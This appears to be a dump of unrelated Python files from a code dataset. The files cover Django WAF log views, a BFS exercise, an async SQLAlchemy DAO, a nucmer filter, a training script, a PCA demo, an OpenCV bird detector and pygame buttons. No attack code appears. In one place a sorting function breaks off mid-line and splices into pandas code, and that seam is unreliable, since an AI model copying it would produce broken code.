\"\"\"父账号查看日志详情\"\"\"\n\n return user_get_log_detail(request)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_download_log(request, domain_id, atk_ip,\n start_time, end_time, log_rows):\n \"\"\"父账号下载日志\n {'action': 'waf_report', 'message': 'success',\n 'data': {'cur_page': 70, 'log_rows': 1381, 'waf_log': [], 'page_cnt': 70},\n 'return_code': 0}\n \"\"\"\n return user_download_log(request, domain_id, atk_ip,\n start_time, end_time, log_rows)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_get_waf_statistics(request):\n \"\"\"父账号查看统计数据\"\"\"\n return user_get_waf_statistics(request)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_download_time_cnt(request, domain_id, start_time, end_time):\n \"\"\"父账号下载拦截攻击次数excel\"\"\"\n return user_download_time_cnt(request, domain_id, start_time, end_time)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_download_ip_list(request, domain_id, start_time, end_time):\n \"\"\"父账号下载拦截攻击来源\"\"\"\n return user_download_ip_list(request, domain_id, start_time, end_time)\n\n\n@login_required\n@rights_required('client_security_domain_list')\ndef parent_download_rule_list(request, domain_id, start_time, end_time):\n \"\"\"父账号下载攻击方式\"\"\"\n return user_download_rule_list(request, domain_id, start_time, end_time)\n","sub_path":"security/ajax/client_ajax.py","file_name":"client_ajax.py","file_ext":"py","file_size_in_byte":10556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"459337073","text":"import sys\na,b = list(map(int,sys.stdin.readline().split()))\n\nroom = [False]*100001\ndef BFS(a,b):\n count = 0\n visited,need_visit = list(),list()\n need_visit.append(a)\n while need_visit:\n \n temp_list = []\n for i in need_visit:\n if i == b:\n print(count)\n return\n if i*2 <= 100000 and room[i*2] == False:\n room[i*2] = True\n temp_list.append(i*2)\n if i>0 and room[i-1] == False:\n room[i-1] = True\n temp_list.append(i-1)\n if i <100000 and room[i+1] == False:\n room[i+1] = True\n temp_list.append(i+1)\n count +=1 \n need_visit = temp_list\nBFS(a,b)","sub_path":"practice/1697_숨바꼭질.py","file_name":"1697_숨바꼭질.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"171768454","text":"import functools\nfrom 
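# The parent_* views above are thin wrappers: each re-applies the same two
# decorators and delegates to a user_* implementation. The repetition could be
# generated by a factory -- sketch only, make_parent_view is an invented name,
# and keeping the explicit defs (as the module does) is also a defensible
# choice for readability and grep-ability:
#
#   def make_parent_view(user_view):
#       @login_required
#       @rights_required('client_security_domain_list')
#       def view(request, *args, **kwargs):
#           return user_view(request, *args, **kwargs)
#       return view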
sqlalchemy.sql import select, and_, func, between, distinct, text\nfrom easyapi_tools.util import str2hump, type_to_json\nfrom .db_util import MysqlDB\nfrom sqlalchemy.exc import NoSuchColumnError\nimport datetime\n\n\nclass Transaction():\n def __init__(self, db: MysqlDB):\n self._db = db\n self._transaction = None\n self._connect = None\n\n async def __aenter__(self):\n self._connect = await self._db._engine.acquire()\n self._transaction = await self._connect.begin()\n return self._connect\n\n async def __aexit__(self, exc_type, exc, tb):\n try:\n await self._transaction.commit()\n except Exception as e:\n await self._transaction.rollback()\n raise e\n finally:\n await self._connect.close()\n\n\ndef get_tx(db: MysqlDB):\n return Transaction(db)\n\n\ndef search_sql(sql, query: dict, table):\n for k in query.keys():\n if type(query[k]) is not list:\n # 兼容处理\n values = [query[k]]\n else:\n values = query[k]\n if k.startswith('_gt_'):\n for v in values:\n sql = sql.where(getattr(table.c, k[4:]) > v)\n elif k.startswith('_gte_'):\n for v in values:\n sql = sql.where(getattr(table.c, k[5:]) >= v)\n elif k.startswith('_lt_'):\n for v in values:\n sql = sql.where(getattr(table.c, k[4:]) < v)\n elif k.startswith('_lte_'):\n for v in values:\n sql = sql.where(getattr(table.c, k[5:]) <= v)\n elif k.startswith('_like_'):\n for v in values:\n sql = sql.where(getattr(table.c, k[6:]).like(v + '%'))\n elif k.startswith('_in_'):\n sql = sql.where(getattr(table.c, k[4:]).in_(values))\n else:\n sql = sql.where(getattr(table.c, k) == values[0])\n return sql\n\n\nclass DaoMetaClass(type):\n \"\"\"\n dao的元类 读取 db 和 table信息 生成\n \"\"\"\n\n def __new__(cls, name, bases, attrs):\n \"\"\"\n\n :param name:\n :param bases:\n :param attrs:\n :return:\n \"\"\"\n if \"BaseDao\" in name:\n return type.__new__(cls, name, bases, attrs)\n if attrs.get('__db__') is None:\n raise NotImplementedError(\"Should have __db__ value.\")\n\n attrs['__tablename__'] = attrs.get('__tablename__') or str2hump(name[:-3]) + 's'\n return type.__new__(cls, name, bases, attrs)\n\n\nclass BaseDao(metaclass=DaoMetaClass):\n @classmethod\n def reformatter(cls, data: dict, *args, **kwargs):\n \"\"\"\n 将model数据转换成dao数据\n :param data:\n :return:\n \"\"\"\n return data\n\n @classmethod\n def formatter(cls, data: dict, *args, **kwargs):\n \"\"\"\n 将dao数据转换成model数据\n :param data:\n :return:\n \"\"\"\n return type_to_json(data)\n\n @classmethod\n async def first(cls, ctx: dict = None, query=None, sorter_key: str = 'id', *args, **kwargs):\n \"\"\"\n 获取根据sorter_key倒叙第一个资源 sorter_key 默认id\n :param ctx:\n :param query:\n :return:\n \"\"\"\n if query is None:\n query = {}\n query = cls.reformatter(query, *args, **kwargs)\n table = cls.__db__[cls.__tablename__]\n sql = select([table])\n if query:\n sql = search_sql(sql, query, table)\n sql = sql.order_by(getattr(table.c, sorter_key, table.c.id).desc())\n res = await cls.__db__.execute(ctx=ctx, sql=sql)\n data = await res.first()\n if not data:\n return None\n return cls.formatter(data, *args, **kwargs)\n\n @classmethod\n async def last(cls, ctx: dict = None, query=None, sorter_key: str = 'id', *args, **kwargs):\n \"\"\"\n 获取根据sorter_key倒叙最后一个资源 sorter_key 默认id\n :param ctx:\n :param query:\n :param sorter_key:\n :return:\n \"\"\"\n if query is None:\n query = {}\n query = cls.reformatter(query, *args, **kwargs)\n table = cls.__db__[cls.__tablename__]\n sql = select([table])\n if query:\n sql = search_sql(sql, query, table)\n sql = sql.order_by(getattr(table.c, sorter_key, table.c.id))\n res = await 
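# Note on Transaction.__aexit__ above: as written it commits even when the
# body of the `async with` block raised, and only rolls back if the commit
# itself fails. A stricter variant would inspect exc_type. Sketch only:
#
#   async def __aexit__(self, exc_type, exc, tb):
#       try:
#           if exc_type is not None:
#               await self._transaction.rollback()
#           else:
#               await self._transaction.commit()
#       finally:
#           await self._connect.close()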
cls.__db__.execute(ctx=ctx, sql=sql)\n\n data = await res.first()\n if not data:\n return None\n return cls.formatter(data, *args, **kwargs)\n\n @classmethod\n async def get(cls, ctx: dict = None, query=None, *args, **kwargs):\n \"\"\"\n 获取单个资源 通常给予unique使用\n :param query:\n :return:\n \"\"\"\n if query is None:\n query = {}\n query = cls.reformatter(query, *args, **kwargs)\n table = cls.__db__[cls.__tablename__]\n sql = select([table])\n if query:\n sql = search_sql(sql, query, table)\n res = await cls.__db__.execute(ctx=ctx, sql=sql)\n data = await res.first()\n if not data:\n return None\n return cls.formatter(data, *args, **kwargs)\n\n @classmethod\n async def query(cls, ctx: dict = None, query: dict = None, pager: dict = None, sorter: dict = None, *args,\n **kwargs):\n \"\"\"\n 通用查询\n :param query:\n :param pager:\n :param sorter:\n :return:\n \"\"\"\n if query is None:\n query = {}\n query = cls.reformatter(query, *args, **kwargs)\n table = cls.__db__[cls.__tablename__]\n sql = select([table])\n if query:\n sql = search_sql(sql, query, table)\n if pager is not None:\n per_page = pager.get('_per_page')\n page = pager.get('_page')\n if per_page:\n sql = sql.limit(per_page)\n if page:\n if per_page is None:\n sql = sql.offset((page - 1) * 30).limit(30)\n else:\n sql = sql.offset((page - 1) * per_page)\n if sorter is None:\n sorter = {}\n order_by = sorter.get('_order_by', 'id')\n desc = sorter.get('_desc', True)\n if desc:\n sql = sql.order_by(getattr(table.c, order_by, table.c.id).desc())\n else:\n sql = sql.order_by(getattr(table.c, order_by, table.c.id))\n res = await cls.__db__.execute(ctx=ctx, sql=sql)\n data = await res.fetchall()\n return list(map(functools.partial(cls.formatter, *args, **kwargs), data))\n\n @classmethod\n async def insert(cls, data: dict, ctx: dict = None, *args, **kwargs):\n \"\"\"\n 通用插入\n :param tx:\n :param args:\n :return:\n \"\"\"\n if data is None:\n return None\n table = cls.__db__[cls.__tablename__]\n data = cls.reformatter(data, *args, **kwargs)\n sql = table.insert().values(**data)\n res = await cls.__db__.execute(ctx=ctx, sql=sql)\n return res.lastrowid\n\n @classmethod\n async def count(cls, ctx: dict = None, query: dict = None, *args, **kwargs):\n \"\"\"\n 计数\n :param query:\n :return:\n \"\"\"\n if query is None:\n query = {}\n query = cls.reformatter(query, *args, **kwargs)\n table = cls.__db__[cls.__tablename__]\n sql = select([func.count('*')], from_obj=table)\n if query:\n sql = search_sql(sql, query, table)\n\n res = await cls.__db__.execute(ctx=ctx, sql=sql)\n return await res.scalar()\n\n @classmethod\n async def execute(cls, ctx: dict = None, sql: str = \"\", *args, **kwargs):\n res = await cls.__db__.execute(ctx=ctx, sql=sql, *args, **kwargs)\n return res\n\n @classmethod\n async def update(cls, ctx: dict = None, where_dict: dict = None, data: dict = None, *args, **kwargs):\n \"\"\"\n 通用修改\n :param ctx:\n :param primay_key:\n :param data:\n :return:\n \"\"\"\n if where_dict is None:\n where_dict = {}\n where_dict = cls.reformatter(where_dict, *args, **kwargs)\n table = cls.__db__[cls.__tablename__]\n data = cls.reformatter(data, *args, **kwargs)\n sql = table.update()\n for key, value in where_dict.items():\n if hasattr(table.c, key):\n sql = sql.where(getattr(table.c, key) == value)\n sql = sql.values(**data)\n res = await cls.__db__.execute(ctx=ctx, sql=sql)\n return res\n\n @classmethod\n async def delete(cls, ctx: dict = None, where_dict: dict = None, *args, **kwargs):\n \"\"\"\n 通用删除\n :param ctx:\n :param where_didt:\n :param 
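# The pager handling in query() above is standard LIMIT/OFFSET paging with a
# fallback page size of 30: offset = (page - 1) * per_page, limit = per_page.
# Worked check (1-based page numbers):
def page_window(page, per_page=30):
    return (page - 1) * per_page, per_page

assert page_window(1, 20) == (0, 20)   # rows 0..19
assert page_window(3, 20) == (40, 20)  # rows 40..59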
data:\n :return:\n \"\"\"\n if where_dict is None:\n where_dict = {}\n where_dict = cls.reformatter(where_dict, *args, **kwargs)\n table = cls.__db__[cls.__tablename__]\n sql = table.delete()\n for key, value in where_dict.items():\n if hasattr(table.c, key):\n sql = sql.where(getattr(table.c, key) == value)\n res = await cls.__db__.execute(ctx=ctx, sql=sql)\n return res\n\n\nclass BusinessBaseDao(BaseDao):\n\n @classmethod\n def formatter(cls, data: dict, *args, **kwargs):\n \"\"\"\n 将dao数据转换成model数据\n :param data:\n :return:\n \"\"\"\n return super().formatter(data)\n\n @classmethod\n def reformatter(cls, data: dict, *args, **kwargs):\n \"\"\"\n 将model数据转换成dao数据\n :param data:\n unscoped: 是否处理软删除\n :return:\n \"\"\"\n new_data = dict()\n for key, value in data.items():\n new_data[key] = value\n if not kwargs.get('unscoped', False) and 'deleted_at' not in data:\n new_data['deleted_at'] = None\n return super().reformatter(new_data)\n\n @classmethod\n async def update(cls, ctx: dict = None, where_dict: dict = None, data: dict = None, unscoped=False,\n modify_by: str = ''):\n \"\"\"\n 业务修改\n :param ctx:\n :param where_dict: 修改数据的条件\n :param data: 修改的数据\n :param modify_by: 修改用户\n :return:\n \"\"\"\n data['updated_at'] = datetime.datetime.now()\n data['updated_by'] = modify_by\n return await super().update(ctx=ctx, where_dict=where_dict, data=data, unscoped=unscoped)\n\n @classmethod\n async def delete(cls, ctx: dict = None, where_dict: dict = None, unscoped=False, modify_by: str = ''):\n \"\"\"\n 业务删除\n :param ctx:\n :param where_dict:\n :param modify_by:\n :return:\n \"\"\"\n if where_dict is None:\n where_dict = {}\n data = dict()\n data['deleted_at'] = datetime.datetime.now()\n data['updated_by'] = modify_by\n return await super().update(ctx=ctx, where_dict=where_dict, data=data, unscoped=unscoped)\n\n @classmethod\n async def insert(cls, ctx: dict = None, data: dict = None, modify_by='', unscoped=False):\n if data is None:\n data = {}\n data['created_at'] = datetime.datetime.now()\n data['created_by'] = modify_by\n return await super().insert(ctx=ctx, data=data, unscoped=unscoped)\n","sub_path":"async_easyapi/dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":11354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"491320309","text":"\n\n\ndef ordenarLosMumeros (num1,num2,num3):\n if num10]\n#pdb.set_trace()\n#repeat regions\ndf3=concat([df2.iloc[:,7],df2.iloc[:,0:2]], axis=1)\ndf3=df3.T.reset_index(drop=True).T\n#repeat regions check orientation\ndf4=concat([df2.iloc[:,8],df2.iloc[:,2:4]], axis=1)\n\n#check if needs to be inverted\nnew_index=[]\nnew_index2=[]\nfor i in range(0,df4.index.size):\n if df4.iloc[i,1]>df4.iloc[i,2]:\n new_index.append(df4.index[i])\n else:\n new_index2.append(df4.index[i])\n\n#check if there are any inverted repeats\nif len(new_index)>0:\n df5=df4[df4.index.isin(new_index)]\n #pdb.set_trace()\n cols = df5.columns.tolist()\n #pdb.set_trace()\n cols=[cols[0]]+cols[-1:]+[cols[1]]\n df5=df5[cols].T.reset_index(drop=True).T\n #normal order\n if len(new_index2)>0:\n df6=df4[df4.index.isin(new_index2)].T.reset_index(drop=True).T\n df7=df5.append(df6)\n df8=df7.append(df3)\n #inverted order fixed\n else:\n df8=concat([df5,df3])\n#pdb.set_trace()\nelse:\n df4=df4.T.reset_index(drop=True).T\n df8=concat([df3,df4])\n#------------------------------------------------------------------------------------------\n\n\n\n#save nucmer repeats for exclusion\nwith open(output_file,'w') as output2:\n 
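# BusinessBaseDao above implements soft deletion: delete() merely stamps
# deleted_at/updated_by, and reformatter() adds deleted_at IS NULL to every
# query unless unscoped=True. Minimal illustration of the convention, using
# plain dicts instead of a database:
import datetime

def soft_delete(row, modify_by=''):
    row['deleted_at'] = datetime.datetime.now()
    row['updated_by'] = modify_by
    return row

def visible(rows):
    return [r for r in rows if r.get('deleted_at') is None]

rows = [{'id': 1, 'deleted_at': None}, soft_delete({'id': 2, 'deleted_at': None})]
assert [r['id'] for r in visible(rows)] == [1]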
df8.to_csv(output2, sep='\\t', index=False, header=None)\n\n\n","sub_path":"tools/SNPDEF/common/filter_nucmer/filter_nucmer.py","file_name":"filter_nucmer.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"429934690","text":"\n\nfrom xai.brain.wordbase.nouns._acre import _ACRE\n\n#calss header\nclass _ACRES(_ACRE, ):\n\tdef __init__(self,): \n\t\t_ACRE.__init__(self)\n\t\tself.name = \"ACRES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"acre\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_acres.py","file_name":"_acres.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"422955593","text":"\"\"\"Module to fit a model given a labeled dataset.\"\"\"\nimport sys\nimport pickle\nimport importlib\n\nimport pandas as pd\n\nimport tools\n\n\ndef main(model_type,\n start_version,\n end_version,\n data_source,\n labeled_data):\n \"\"\"Fit a model.\n Args:\n model_type (str): type of model to train.\n start_version (str): version of model to start the training from.\n end_version (str): version to store the parameters.\n data_source (str): source to take the labeled dataset from.\n labeled_data (list): dataset use to train\n [\n ([ 0.0, 6.0, 6.0, 2.0], 1.0)\n ([ 8.0, 7.0, 4.0, 2.0], 1.0)\n ]\n \"\"\"\n # Load data\n labeled_data = load_data(data_source) if labeled_data is None else labeled_data\n\n # Init the model\n model = init_model(model_type)\n\n # Load parameters\n model.load_parameters(model_version=start_version)\n\n # Fit the model\n model.fit(labeled_data,\n alpha=0.00001,\n epochs=20)\n\n # Persist the parameters\n model.persist_parameters(model_version=end_version)\n\n\ndef load_data(data_source):\n \"\"\"Load labeled data.\"\"\"\n with open(\"data/{}/data.pkl\".format(data_source), \"rb\") as handle:\n labeled_data = pickle.load(handle)\n return labeled_data\n\n\ndef init_model(model_type):\n \"\"\"Instanciate an instance of the class of the given type of model.\n Args:\n model_type (str): type of model to train.\n Return:\n model (Model): instance of Model.\n \"\"\"\n # Import model\n model_module = importlib.import_module(\"library.{}.model\".format(model_type))\n # Return the instance\n return model_module.Model()\n\n\nif __name__ == '__main__':\n model = sys.argv[1] if len(sys.argv) > 1 else \"pure_python\"\n source = sys.argv[2] if len(sys.argv) > 2 else \"us_election\"\n main(model,\n start_version=None,\n end_version=\"X\",\n data_source=source,\n labeled_data=None)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"403421583","text":"'''\nCreated on Sept 09, 2016\n\n@author: kalyan\n'''\nfrom math import sqrt, pow, sin, cos\nimport numpy as np\nimport random\n\nimport pdb\n\nc=15.0\nb=5.0\na=2.0\nstepSz = 0.1\ntheta = 60.0/360.0\ncords = []\n\ni=0\nfor x in np.arange(-c,c,stepSz).tolist():\n for y in np.arange(-b,b,stepSz).tolist():\n zmax = a*sqrt(min(1.0,max(0.0, 1.0 - pow(x,2)/pow(c,2) - pow(y,2)/pow(b,2))))\n zmin = -a*sqrt(min(1.0,max(0.0, 1.0 - pow(x,2)/pow(c,2) - pow(y,2)/pow(b,2))))\n for z in np.arange(zmin,zmax,stepSz).tolist():\n cords.append([x,y,z])\nrandom.shuffle(cords)\ncords = np.asarray(cords)\ncords = cords[0:2000,:]\n\n#cords = np.dot(cords, np.array([[cos(theta), -sin(theta), 0],[sin(theta), cos(theta), 
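# train.py above resolves the model class at runtime via
# importlib.import_module("library.{type}.model"). Sketch of the same idiom
# with an explicit failure message (the library.<type>.model layout is the
# script's own assumption):
import importlib

def init_model(model_type):
    try:
        module = importlib.import_module("library.{}.model".format(model_type))
    except ModuleNotFoundError as err:
        raise ValueError("unknown model type: {!r}".format(model_type)) from err
    return module.Model()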
0],[0, 0, 1]]))\n#cords = np.dot(cords, np.array([[cos(theta), 0, sin(theta)],[0, 1, 0],[-sin(theta), 0, cos(theta)]]))\n#pdb.set_trace()\n#print len(cords)\n'''\nPlot using Matplotlib \n'''\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef plot3D(xCords,col):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n \n ax.scatter(xCords[:,0], xCords[:,1], xCords[:,2], color=col,\n label='Standardized [$N (\\mu=0, \\; \\sigma=1)$]', alpha=0.3)\n\n ax.set_xlabel('X-Axis')\n ax.set_ylabel('Y-Axis')\n ax.set_zlabel('Z-Axis')\n plt.grid()\n plt.tight_layout()\n\nplot3D(cords,'red')\n#plt.show()\n\nfrom sklearn.decomposition import PCA as sklearnPCA\nsklearn_pca = sklearnPCA(n_components=2,whiten=True)\nY_sklearn = sklearn_pca.fit_transform(cords)\nXX = sklearn_pca.inverse_transform(Y_sklearn)\n\nplot3D(Y_sklearn,'green')\nplt.show()\n","sub_path":"demo02_PCA.py","file_name":"demo02_PCA.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"532644358","text":"import cv2\n# import nexmo\n\n# Nexmo messaging\n# client = nexmo.Client(key='Your nexmo key', secret='Your nexmo secret key')\nnumber = \"your phone number with the country code\"\nmessage = \"Pigeons have entered your farm\"\n\n\n# initalizing the camera\ncap = cv2.VideoCapture('birds.mp4')\nbirdsCascade = cv2.CascadeClassifier(\"birds1.xml\")\nMAX_NUM_BIRDS = 5\nrunning = True\ncount = 0\n\n# Detecting the birds\nwhile running:\n # if count == 1:\n # # response = client.send_message({\n # # 'from': 'GYMAALE',\n # # 'to': number,\n # # 'text': message,\n # # })\n # # response = response['messages'][0]\n # # if response['status'] == '0':\n # # print(\"MESSAGE DELIVERED SUCCESSFULLY\", response['message-id'])\n # # else:\n # # print(\"ERROR SENDING MESSAGE\", response['error-text'])\n count += 1\n ret, frame = cap.read()\n print(\"Ret is \", ret)\n if ret:\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n birds = birdsCascade.detectMultiScale(\n gray,\n scaleFactor=1.4,\n minNeighbors=1,\n # minSize=(10,10),\n maxSize=(30, 30),\n flags=cv2.CASCADE_SCALE_IMAGE\n )\n\n if (len(birds) >= MAX_NUM_BIRDS):\n print(\"Detected {0} Birds.\".format(len(birds)))\n\n # Drawing a rectangle around a bird approaching the farm\n for (x, y, w, h) in birds:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 200, 0), 2)\n\n # Displaying the resulting frame\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n running = False\n else:\n running = False\n\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"404392978","text":"# --------------------------------------------------------------------\r\n# Program: Button Classes\r\n# Author: Alex Hyde\r\n# Date: Oct 25 2019\r\n# Description: Button classes for creating buttons and processing\r\n# button clicks. 
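# The detection loop above is the standard OpenCV Haar-cascade recipe:
# grayscale frame -> detectMultiScale -> draw rectangles. Minimal sketch
# (file names are placeholders, as in the original script):
import cv2

cascade = cv2.CascadeClassifier("birds1.xml")
frame = cv2.imread("frame.png")  # stand-in for a frame from cap.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
hits = cascade.detectMultiScale(gray, scaleFactor=1.4, minNeighbors=1)
for (x, y, w, h) in hits:
    cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 200, 0), 2)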
Fully customizable with custom on click and release\r\n# functions.\r\n# Input: Allows easy processing of user clicks.\r\n# --------------------------------------------------------------------\r\n\r\nimport pygame\r\nimport label\r\nimport color as c\r\n\r\npygame.init()\r\n\r\n# alignment constants\r\nLEFT = 0\r\nRIGHT = 1\r\nTOP = 0\r\nBOTTOM = 1\r\nCENTER = 0.5\r\n\r\n\r\n# button list class for easily processing multiple buttons on one screen\r\nclass ButtonList:\r\n def __init__(self, buttonList=None):\r\n if buttonList is None:\r\n buttonList = []\r\n self.buttonList = list(buttonList) # if passed a tuple\r\n self.current = -1 # used for iteration\r\n self.clicked = []\r\n self.released = []\r\n self.hovered = []\r\n self.visible = True\r\n self.active = True\r\n\r\n # return button index, given the button\r\n def find(self, item):\r\n if item in self.buttonList:\r\n return self.buttonList.index(item)\r\n else:\r\n return -1\r\n\r\n # returns button given its index\r\n def get(self, ind):\r\n return self.buttonList[ind]\r\n\r\n def set(self, ind, new):\r\n self.buttonList[ind] = new\r\n\r\n # return button at a set of coordinates, -1 if the is no button at those coordinates\r\n def get_button_at(self, pos):\r\n for b in self.buttonList:\r\n if b.is_hover(pos):\r\n return b\r\n return -1\r\n\r\n def draw(self, win):\r\n if self.visible: # if button list is visible\r\n for b in self.buttonList:\r\n b.draw(win)\r\n\r\n def add(self, button):\r\n self.buttonList.append(button)\r\n\r\n # process button clicks, releases and hovers\r\n def process_events(self, click_bool, release_bool, mousepos):\r\n self.released = []\r\n self.clicked = []\r\n self.hovered = []\r\n if self.active: # if the button list is active\r\n for b in self.buttonList:\r\n if type(b) == Slider:\r\n b.process(click_bool, release_bool, mousepos)\r\n elif (b.is_hover(mousepos) or b.is_clicked) and b.is_active():\r\n if click_bool:\r\n b.on_click_default()\r\n b.on_click(b)\r\n self.clicked.append(b)\r\n elif release_bool and b.is_clicked:\r\n b.on_release_default()\r\n b.on_release(b)\r\n self.released.append(b)\r\n else:\r\n b.on_hover()\r\n self.hovered.append(b)\r\n else:\r\n b.reset_color()\r\n else:\r\n for b in self.buttonList:\r\n if type(b) == Slider:\r\n b.slide_button.reset_color()\r\n else:\r\n b.reset_color()\r\n\r\n # return all clicked buttons\r\n def get_clicked(self):\r\n return self.clicked\r\n\r\n # return all released buttons\r\n def get_released(self):\r\n return self.released\r\n\r\n # return all hovered buttons\r\n def get_hovered(self):\r\n return self.hovered\r\n\r\n def set_visible(self, b):\r\n self.visible = b\r\n\r\n def set_active(self, b):\r\n self.active = b\r\n\r\n # add two button lists\r\n def __add__(self, other):\r\n return ButtonList(self.buttonList + other.buttonList)\r\n\r\n # used for iteration\r\n def __iter__(self):\r\n return self\r\n\r\n # used for iteration\r\n def __next__(self):\r\n self.current += 1\r\n if self.current < len(self.buttonList):\r\n return self.buttonList[self.current]\r\n self.current = -1\r\n raise StopIteration\r\n\r\n\r\nclass Button:\r\n def __init__(self, rect, fColor=(255, 255, 255), bColor=(0, 0, 0), onHoldColor=(100, 100, 100),\r\n onHoverColor=(200, 200, 200), tColor=(0, 0, 0), border=1, text=\"\", visible=True, active=True,\r\n tAlignx=CENTER, tAligny=CENTER, text_size=18):\r\n self.x, self.y, self.w, self.h = rect\r\n self.b = border\r\n\r\n self.text = text\r\n self.text_size = text_size\r\n # text alignment\r\n self.tAlignx = tAlignx\r\n 
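# Note on the iteration support in ButtonList above: the cursor lives on the
# container itself (self.current), so nested or interrupted loops over the
# same ButtonList interfere with each other. Delegating to the underlying
# list's iterator avoids that. Sketch only:
#
#   def __iter__(self):
#       return iter(self.buttonList)
#   # (and drop __next__ and self.current entirely)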
self.tAligny = tAligny\r\n # colors\r\n self.fColor = fColor\r\n self.onHoldColor = onHoldColor\r\n self.currentFillColor = fColor\r\n self.onHoverColor = onHoverColor\r\n self.bColor = bColor\r\n self.tColor = tColor\r\n # rendering text drawable\r\n self.rendered_text = None\r\n self.render_text()\r\n\r\n self.visible = visible\r\n self.active = active\r\n self.is_clicked = False\r\n self.is_hovered = False\r\n self.on_click = self.blank_func # on click function (to be replaced in an instantiated button)\r\n self.on_release = self.blank_func # on release function (to be replaced in an instantiated button)\r\n self.values = {} # can be used to store custom values\r\n\r\n def draw(self, win):\r\n if self.visible:\r\n if self.currentFillColor is not None:\r\n pygame.draw.rect(win, self.currentFillColor, self.rect())\r\n if self.bColor is not None:\r\n self.draw_border(win)\r\n self.rendered_text.draw(win)\r\n\r\n def draw_border(self, win):\r\n x, y, w, h = self.rect()\r\n pygame.draw.rect(win, self.bColor, (x, y, w, self.b))\r\n pygame.draw.rect(win, self.bColor, (x, y + self.b, self.b, h - self.b))\r\n pygame.draw.rect(win, self.bColor, (x + self.b, y + h - self.b, w - self.b, self.b))\r\n pygame.draw.rect(win, self.bColor, (x + w - self.b, y + self.b, self.b, h - self.b))\r\n\r\n # renders text drawable\r\n def render_text(self):\r\n self.rendered_text = label.Label(self.text, color=self.tColor, size=self.text_size)\r\n self.reset_text_pos()\r\n\r\n # sets text drawable position (based on alignment)\r\n def reset_text_pos(self):\r\n self.rendered_text.set_x(self.x + (self.w-self.rendered_text.get_width())*self.tAlignx)\r\n self.rendered_text.set_y(self.y + (self.h-self.rendered_text.get_height())*self.tAligny)\r\n\r\n # empty function (to be replaced by custom functions in instantiated button objects)\r\n def blank_func(self, blank):\r\n pass\r\n\r\n # return boolean if the mouse position collides with the button\r\n def is_hover(self, mousepos):\r\n x, y = mousepos\r\n return self.x < x < self.x + self.w and self.y < y < self.y + self.h\r\n\r\n # default function when button if clicked (change color)\r\n def on_click_default(self):\r\n self.currentFillColor = self.onHoldColor\r\n self.is_clicked = True\r\n\r\n # default function when button if released (change color)\r\n def on_release_default(self):\r\n self.currentFillColor = self.fColor\r\n self.is_clicked = False\r\n\r\n # default function when button if hovered (change color)\r\n def on_hover(self):\r\n if not self.is_clicked:\r\n self.currentFillColor = self.onHoverColor\r\n\r\n def convert_to_slider(self, slide_wh, change=False, text_slider_percent=50, color=c.WHITE, bColor=c.BLACK, border=1,\r\n start_value=0, end_value=100, slide_value=None, slide_color=c.BLACK, text_size=18,\r\n tColor=c.BLACK, slider_border=5):\r\n return Slider(self.rect(), slide_wh, text_slider_percent, color, bColor, border, start_value, end_value,\r\n slide_value, slide_color, self.text, self.text_size, self.tAlignx, self.tAligny, tColor,\r\n slider_border, self.fColor, self.bColor, self.onHoldColor, self.onHoverColor,\r\n visible=self.visible, active=self.active)\r\n\r\n # --------------------SETTER AND GETTER METHODS--------------------\r\n\r\n def set_text(self, text):\r\n self.text = text\r\n self.render_text()\r\n\r\n def rect(self):\r\n return self.x, self.y, self.w, self.h\r\n\r\n def set_x(self, x):\r\n xdif = x - self.x\r\n self.x += xdif\r\n self.rendered_text.set_x(self.rendered_text.x + xdif)\r\n\r\n def set_y(self, y):\r\n ydif = y - 
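# is_hover() above is a plain point-in-rectangle test with strict
# inequalities, so points exactly on an edge do not count as a hit:
def point_in_rect(px, py, x, y, w, h):
    return x < px < x + w and y < py < y + h

assert point_in_rect(15, 15, 10, 10, 20, 20) is True
assert point_in_rect(10, 15, 10, 10, 20, 20) is False  # on the left edge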
